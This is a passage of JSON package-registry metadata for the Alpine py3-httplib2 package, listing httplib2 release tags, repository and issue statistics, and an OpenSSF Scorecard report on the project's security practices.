ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T03:48:32.350Z","dependent_packages_count":6,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":7.417794970986461,"stargazers_count":5.909090909090909,"forks_count":4.090909090909091,"average":4.354448742746615},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.10","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":"fabian@affolter-engineering.ch","url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":254,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T01:16:30.422Z","updated_at":"2023-02-01T01:16:30.422Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.10","url":"https://pkgs.alpinelinux.org/packages?branch=v3.10","ecosystem":"alpine","default":false,"packages_count":10340,"maintainers_count":177,"namespaces_count":2,"keywords_count":925,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":401},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.780Z","updated_at":"2026-08-25T05:05:03.800Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.10/namespaces"}},{"id":6119656,"name":"py3-httplib2","ecosystem":"alpine","description":"A Python HTTP client library (for python3)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2017-10-31T19:05:01.000Z","latest_release_published_at":"2017-10-31T19:05:01.000Z","latest_release_number":"0.10.3-r0","last_synced_at":"2026-03-08T18:56:45.616Z","created_at":"2023-01-31T21:39:18.701Z","updated_at":"2026-08-22T03:48:32.358Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.7/main/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release 